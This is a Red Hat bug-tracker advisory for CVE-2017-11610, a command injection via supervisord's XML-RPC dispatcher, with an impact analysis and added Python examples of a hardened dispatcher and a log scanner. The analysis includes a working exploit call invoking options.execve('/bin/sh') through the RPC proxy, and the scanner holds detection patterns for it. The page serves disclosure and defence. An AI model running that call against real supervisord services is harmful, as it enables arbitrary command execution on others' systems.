Bug 1476143 (CVE-2017-11610)
| Summary: | CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Andrej Nemec <anemec> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | unspecified | CC: | agrimm, avibelli, cpelland, dajohnso, drusso, gblomqui, gmccullo, gtanzill, hhudgeon, jal233, jbalunas, jfrey, jhardy, jmrazek, jprause, jshepherd, kevin, obarenbo, roliveri, rrajasek, simaishi, sisharma, tkirby, troxor0, tsao |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | supervisor 3.3.3 | Doc Type: | If docs needed, set a value |
| Doc Text: | A vulnerability was found in the XML-RPC interface in supervisord. The dispatcher resolved dotted method names by traversing object attributes, so a crafted request naming a nested path such as supervisor.supervisord.options.execve() could cause arbitrary shell commands to be executed on the server as the user running supervisord. Exploitation requires the attacker to reach and authenticate to the supervisord XML-RPC service; an inet_http_server configured without HTTP authentication (supervisord logs a CRIT warning at startup in that case) makes the interface usable by anyone who can connect to its port. | | |
| Story Points: | --- | | |
| Clone Of: | | Environment: | |
| Last Closed: | 2019-06-08 03:19:10 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 1476144, 1476145, 1476286, 1476287, 1476355, 1476356, 1477924 | | |
| Bug Blocks: | 1476147 | | |
Description
Andrej Nemec
2017-07-28 06:57:02 UTC
Created supervisor tracking bugs for this issue:

Affects: epel-all [bug 1476145]
Affects: fedora-all [bug 1476144]

Analysis:

Default install on Red Hat Ceph Storage does not run any service on port 9001 and does not accept connections.

```
~]$ python2
Python 2.7.5 (default, Aug 2 2016, 04:20:16)
[GCC 4.8.5 20150623 (Red Hat 4.8.5-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2', SupervisorTransport('', '', 'unix:///var/tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 2] No such file or directory
```

The supervisor package is used by calamari, which uses the following configuration in a default install:

```
~]# vi /etc/supervisor/conf.d/calamari.conf
[supervisord]
loglevel=warn
logfile=/var/log/calamari/supervisord.log
childlogdir=/var/log/calamari

[program:carbon-cache]
command=/opt/calamari/venv/bin/carbon-cache.py --debug --config /etc/graphite/carbon.conf start

[program:cthulhu]
command=/opt/calamari/venv/bin/cthulhu-manager
stderr_logfile = /var/log/calamari/cthulhu_stderr.log
stdout_logfile = /var/log/calamari/cthulhu_stdout.log
```

The http server is not enabled:

```
~]# vi /etc/supervisord.conf
;[inet_http_server]         ; inet (TCP) server disabled by default
;port=127.0.0.1:9001        ; (ip_address:port specifier, *:port for all iface)
```

1. If the server is enabled (manually enabling the server):

```
INFO RPC interface 'supervisor' initialized
CRIT Server 'inet_http_server' running without any HTTP authentication checking
INFO supervisord started with pid 23888
TRAC XML-RPC method called: supervisor.supervisord.options.execve()
```

2. With the unix domain socket:

```
>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2',SupervisorTransport('', '', 'unix:///tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 13] Permission denied
```

Supervisor is used by the Nagios component of RHMAP. In the supervisor configuration the XMLRPC plugin is not enabled. Also, the Nagios images only expose port 8080 (httpd), not the XMLRPC network port (9001). Marking RHMAP as not affected.

Updated CVSSv3 score to reflect the fact that while several products use this component, they do not expose the supervisor service to the network by default. Downgrading to medium because of this and the fact that these products also do not have local untrusted user accounts.

This issue has been addressed in the following products:

CloudForms Management Engine 5.8
Via RHSA-2017:3005 https://access.redhat.com/errata/RHSA-2017:3005
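The call `server.supervisor.supervisord.options.execve('/bin/sh', [], {})` in the analysis above works because the XML-RPC dispatcher walks a dotted method name attribute by attribute, so the lookup does not stop at the RPC interface and reaches the daemon's execve. The model below is an added example, not supervisor's own code: `Root`, `SupervisorNamespace`, `Supervisord` and `Options` are stand-ins for the real objects, `execve()` only records the call, `traverse_vulnerable` mirrors a getattr-walking dispatcher, and `traverse_hardened` applies the kind of restriction that closes the hole (exactly `namespace.method`, no leading underscore, a bound method on a registered interface). Whether that matches the exact upstream change in supervisor 3.3.3 is not established by this page.

```python
"""Vulnerable vs hardened XML-RPC dotted-name dispatch (model of CVE-2017-11610).

Added example; the classes are stand-ins for supervisord's objects and the
stand-in execve() raises instead of running anything.
"""
import types


class ExecutedCommand(Exception):
    """Raised by the stand-in execve() so callers can see what was reached."""


class UnknownMethod(Exception):
    """Stand-in for supervisor's UNKNOWN_METHOD fault."""


class Options:
    # Stand-in for supervisord.options; the real one wraps os.execve().
    def execve(self, filename, argv, env):
        raise ExecutedCommand(filename)


class Supervisord:
    def __init__(self):
        self.options = Options()


class SupervisorNamespace:
    """Stand-in for the 'supervisor' RPC interface: public methods are the
    API, but the object also holds a reference to the daemon."""

    def __init__(self, supervisord):
        self.supervisord = supervisord

    def getState(self):
        return {'statecode': 1, 'statename': 'RUNNING'}

    def _private(self):
        return 'should never be remotely callable'


class Root:
    """Stand-in for the object the dispatcher resolves method names against."""

    def __init__(self):
        self.supervisor = SupervisorNamespace(Supervisord())


def traverse_vulnerable(root, method, params):
    """getattr-walk every dotted component, then call whatever is there.
    Nothing stops the walk at the RPC interface, so
    'supervisor.supervisord.options.execve' reaches the daemon's execve."""
    ob = root
    for part in method.split('.'):
        ob = getattr(ob, part, None)
        if ob is None:
            raise UnknownMethod(method)
    return ob(*params)


def traverse_hardened(root, method, params, namespaces=('supervisor',)):
    """Accept exactly 'namespace.method', refuse underscore-prefixed names,
    and only call a method bound to a registered RPC interface object."""
    parts = method.split('.')
    if len(parts) != 2:
        raise UnknownMethod(method)
    namespace, name = parts
    if namespace not in namespaces or name.startswith('_'):
        raise UnknownMethod(method)
    iface = getattr(root, namespace, None)
    func = getattr(iface, name, None)
    if not isinstance(func, types.MethodType) or func.__self__ is not iface:
        raise UnknownMethod(method)
    return func(*params)


EXPLOIT = 'supervisor.supervisord.options.execve'


def outcome(dispatch, method, params=()):
    """Classify one dispatch attempt: ('ok', result), ('executed', path) or
    ('unknown_method', None)."""
    try:
        return ('ok', dispatch(Root(), method, params))
    except ExecutedCommand as e:
        return ('executed', str(e))
    except UnknownMethod:
        return ('unknown_method', None)


if __name__ == '__main__':
    for label, fn in (('vulnerable', traverse_vulnerable),
                      ('hardened', traverse_hardened)):
        print(label, outcome(fn, 'supervisor.getState'))
        print(label, outcome(fn, EXPLOIT, ('/bin/sh', [], {})))
        print(label, outcome(fn, 'supervisor._private'))
```

The two-component rule is what matters: once the dispatcher refuses to descend past the interface object, the daemon, its options and everything else reachable by attribute are out of scope regardless of which attribute names an attacker guesses. The underscore check additionally keeps dunder attributes such as `__class__` off the remote surface.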
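The log excerpt above carries two signals worth alerting on: the CRIT line for an inet_http_server started without HTTP authentication, and a TRAC line whose method name walks past a namespace.method pair. The scanner below is an added example, not part of the bug report or of supervisor; the sample log lines are constructed here in the format of the excerpt, and the default namespace set (`supervisor`, `system`) is an assumption about a stock supervisord install.

```python
"""Scan supervisord log lines for CVE-2017-11610 exposure signals.

Added example with constructed log lines (not from the bug report).
"""
import re

# supervisord only emits "XML-RPC method called: ..." at loglevel=trace (TRAC);
# the calamari config above runs at loglevel=warn, so that signal is absent there.
METHOD_CALL = re.compile(r'XML-RPC method called: (?P<method>[\w.]+)\(\)')
NO_AUTH = re.compile(
    r"Server '(?P<server>\w+)' running without any HTTP authentication checking")

# Assumed default RPC namespaces of a stock supervisord; anything else is suspect.
KNOWN_NAMESPACES = {'supervisor', 'system'}


def check_method_name(method):
    """Return the reasons a dotted XML-RPC method name looks malicious
    (empty list for a normal namespace.method call)."""
    parts = method.split('.')
    reasons = []
    if len(parts) != 2:
        reasons.append('nested attribute traversal (%d components)' % len(parts))
    if parts[0] not in KNOWN_NAMESPACES:
        reasons.append('unknown namespace %r' % parts[0])
    if any(p.startswith('_') for p in parts[1:]):
        reasons.append('underscore-prefixed attribute')
    return reasons


def scan(lines):
    """Return (line_no, finding) pairs for the given supervisord log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = NO_AUTH.search(line)
        if m:
            findings.append((n, 'unauthenticated %s' % m.group('server')))
        m = METHOD_CALL.search(line)
        if m:
            for reason in check_method_name(m.group('method')):
                findings.append((n, '%s: %s' % (m.group('method'), reason)))
    return findings


# Constructed sample, modelled on the excerpt in the analysis above.
SAMPLE_LOG = [
    "2017-07-28 06:57:02,000 INFO RPC interface 'supervisor' initialized",
    "2017-07-28 06:57:02,001 CRIT Server 'inet_http_server' running without any HTTP authentication checking",
    "2017-07-28 06:57:02,002 INFO supervisord started with pid 23888",
    "2017-07-28 06:57:05,000 TRAC XML-RPC method called: supervisor.getState()",
    "2017-07-28 06:57:06,000 TRAC XML-RPC method called: supervisor.supervisord.options.execve()",
]


if __name__ == '__main__':
    for line_no, finding in scan(SAMPLE_LOG):
        print('line %d: %s' % (line_no, finding))
```

Run against `/var/log/calamari/supervisord.log` or whatever `logfile=` points at; the unauthenticated-server line appears at any log level, whereas the method-call lines need `loglevel=trace`, so on a default calamari install only the first check can fire.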